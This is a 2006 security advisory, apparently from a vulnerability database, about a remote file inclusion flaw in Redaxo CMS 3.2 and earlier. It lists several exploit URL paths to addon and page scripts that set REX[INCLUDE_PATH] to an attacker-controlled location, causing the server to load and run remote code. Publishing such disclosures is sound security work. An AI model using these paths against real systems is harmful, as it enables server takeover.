Redaxo CMS <= 3.2 Remote File Include

2006-06-07 / 2006-06-08

Credit: beford

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-2845 | CVE-2006-2844 | CVE-2006-2843

CWE: N/A

Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>
Redaxo 3.2 - 3.1 - 3.0
./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PAT
H]=attacker
Redaxo 3.0
./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index
.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.
inc.php?REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.ph
p?REX[INCLUDE_PATH]=attacker
Redaxo 2.7.4
./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PA
TH]=attacker
./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_
PATH]=attacker

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Redaxo CMS <= 3.2 Remote File Include

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.